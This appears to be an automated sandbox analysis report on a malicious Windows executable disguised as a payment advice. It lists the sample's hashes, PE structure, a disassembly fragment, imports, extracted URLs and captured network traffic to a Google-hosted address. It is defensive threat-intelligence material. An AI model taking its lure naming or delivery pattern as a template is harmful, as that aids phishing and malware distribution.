http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.micr	explorer.exe, 00000010.00000000.474142184.000000000F54C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.58.214.225	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	387728
Start date:	15.04.2021
Start time:	14:59:05
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	payment advice_mt103645367.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@6/0@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.8% (good quality ratio 50.7%) Quality average: 76.2% Quality standard deviation: 28.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.209.183, 13.64.90.137, 168.61.161.212, 40.88.32.150, 184.30.25.218, 92.122.145.220, 184.30.24.56, 8.241.89.254, 8.241.78.126, 8.252.5.126, 8.241.82.254, 67.26.137.254, 51.103.5.186, 52.147.198.201, 20.82.210.154, 216.58.207.142, 23.32.238.234, 23.32.238.177 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcoleus16.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Dobra-Dossin.html	Get hash	malicious	Browse	216.58.214.225
	#Ud83d#Udcde977.htm	Get hash	malicious	Browse	216.58.214.225
	faktura_ODfk0021.exe	Get hash	malicious	Browse	216.58.214.225
	documents-1865367136.xlsb	Get hash	malicious	Browse	216.58.214.225
	documents-1522654785.xlsb	Get hash	malicious	Browse	216.58.214.225
	documents-1988650417.xlsb	Get hash	malicious	Browse	216.58.214.225
	documents-852304211.xlsb	Get hash	malicious	Browse	216.58.214.225
	Tooligram_PRO.exe	Get hash	malicious	Browse	216.58.214.225
	documents-1884913828.xlsb	Get hash	malicious	Browse	216.58.214.225
	documents-1097636918.xlsb	Get hash	malicious	Browse	216.58.214.225
	documents-798055763.xlsb	Get hash	malicious	Browse	216.58.214.225
	documents-590513756.xlsb	Get hash	malicious	Browse	216.58.214.225
	#Ud83d#Udcde Bpost.be AudioMessage 59-20596.htm	Get hash	malicious	Browse	216.58.214.225
	VoicePlayback (01_47) for steph.miller tsbbank .html	Get hash	malicious	Browse	216.58.214.225
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse	216.58.214.225
	documents-1321106901.xlsb	Get hash	malicious	Browse	216.58.214.225
	BR-424305.htm	Get hash	malicious	Browse	216.58.214.225
	0901e76c84536f06b_2500332020005403099_0901e76c4489e546f06b_250020214405500030995.WsF	Get hash	malicious	Browse	216.58.214.225
	mail_6512365134_7863_20210413.html	Get hash	malicious	Browse	216.58.214.225
	Cocha904.htm	Get hash	malicious	Browse	216.58.214.225

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.7343961403363135
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	payment advice_mt103645367.exe
File size:	159744
MD5:	e4f3fd2e517743504817b7c3e2032de3
SHA1:	b42b6607bef7562a38a55b1d74fbb6e5d91f8fcf
SHA256:	08673c97c9a0e20536ce90e162e7da11dde8d4bfc4c01cabe7d3baeafaf449e6
SHA512:	b5cfc38957afef0641a7da98b9d48a5af2f25bc06a4d33865a0204e788902f4ad1e57efb3c34a5ae970bf3fa03eeddb084707ef4fb2b97f0c3ba908c53092822
SSDEEP:	3072:E4C7pdXpYywG+8NjNo/NKaBZ2/TJdFweCs2Z1:E4uIy3+gNo/Qaz2/TJ7ZZ2Z
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W...K...W...u...W...q...W..Rich.W..........................PE..L...P.bT.................@...`...............P....@

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4017e8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5462FA50 [Wed Nov 12 06:12:32 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	66c809d2e31d4e6411dd9b96c6b12187

Entrypoint Preview

Instruction
push 004019F8h
call 00007F1E14932D45h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [9497E2F7h], bl
push es
aam 48h
mov bl, C8h
mov al, 02h
adc al, 2Ah
clc
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edx], cl
add edi, dword ptr [ecx]
add byte ptr [eax], al
add byte ptr [eax+72h], dl
outsd
push 00000065h
arpl word ptr [ecx+esi+00h], si
or byte ptr [ecx+00h], al
pop es
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add eax, 5A7EE253h
and dword ptr [edx+esi+7079BA49h], ebp
mov ds, word ptr [ebx]
push ebx
fiadd word ptr [esi]
sub al, 1Ah
mov eax, dword ptr [09298894h]
dec ecx
mov dh, F8h
mov dword ptr [edi], eax
xlatb
push edx
inc eax
or edi, dword ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add dword ptr [eax], eax
add byte ptr [ecx+00h], al
add byte ptr [eax], al
add byte ptr [ebx], cl
add byte ptr [ebx+6Fh], dl
insb
outsb
outsd
jnc 00007F1E14932DC6h
insb
add byte ptr [49000401h], cl
push edi
inc ecx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23b24	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2a000	0x99c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x231a0	0x24000	False	0.409518771701	data	5.9964546897	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x25000	0x460c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2a000	0x99c	0x1000	False	0.17578125	data	2.07553915929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x2a86c	0x130	data
RT_ICON	0x2a584	0x2e8	data
RT_ICON	0x2a45c	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2a42c	0x30	data
RT_VERSION	0x2a150	0x2dc	data

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaVar2Vec, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Vought
InternalName	illusive
FileVersion	1.00
CompanyName	Vought
LegalTrademarks	Vought
Comments	Vought
ProductName	Vought
ProductVersion	1.00
FileDescription	Vought
OriginalFilename	illusive.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2021 15:01:48.168356895 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.220633030 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.220750093 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.221540928 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.273560047 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.295789003 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.295814037 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.295831919 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.295850039 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.295896053 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.295938015 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.315543890 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.371484041 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.371601105 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.372772932 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.431608915 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.649781942 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.649816036 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.649837971 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.649858952 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.649863958 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.649879932 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.649899006 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.649940968 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.653405905 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.653444052 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.653563976 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.657048941 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.657087088 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.657141924 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.657183886 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.660712004 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.660753012 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.660875082 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.664372921 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.664402962 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.664524078 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.681829929 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.681978941 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.701664925 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.701687098 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.701781988 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.701817989 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.704477072 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.704499960 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.704586983 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.707109928 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.707134008 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.707227945 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.707297087 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.710812092 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.710830927 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.710927963 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.714438915 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.714457035 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.714576006 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.714641094 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.718153954 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.718182087 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.718339920 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.721776009 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.721796989 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.721900940 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.725456953 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.725483894 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.725550890 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.725589991 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.729058981 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.729087114 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.729129076 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.729165077 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.732645988 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.732671976 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.732729912 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.732772112 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.736342907 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.736368895 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.736434937 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.736515999 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.739828110 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.739869118 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.740005016 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.743393898 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.743427038 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.743531942 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.743571043 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.747034073 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.747059107 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.747467995 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.753494978 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.753664017 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.754251957 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.754268885 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.754344940 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.757025003 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.757044077 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.757096052 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.757134914 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.759288073 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.759309053 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.759371042 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.759413004 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.761689901 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.761781931 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.761842012 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.761887074 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.764157057 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.764190912 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.764496088 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.766546965 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.766582012 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.766661882 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.768979073 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.769006968 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.769098043 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.771431923 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.771457911 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.771555901 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.771589041 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.773829937 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.773849964 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.773917913 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.773952007 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.776325941 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.776345968 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.776413918 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.778724909 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.778748035 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.778841019 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.781138897 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.781162977 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.781274080 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.781310081 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.783588886 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.783608913 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.783648968 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.783684015 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.787240028 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.787270069 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.787336111 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.787379980 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.788444996 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.788464069 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.788515091 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.788552046 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.792054892 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.792073965 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.792085886 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.792193890 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.794502974 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.794522047 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.794568062 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.794611931 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.797185898 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.797203064 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.797301054 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.799127102 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.799153090 CEST	443	49727	216.58.214.225	192.168.2.3
Apr 15, 2021 15:01:48.799245119 CEST	49727	443	192.168.2.3	216.58.214.225
Apr 15, 2021 15:01:48.801281929 CEST	443	49727	216.58.214.225	192.168.2.3
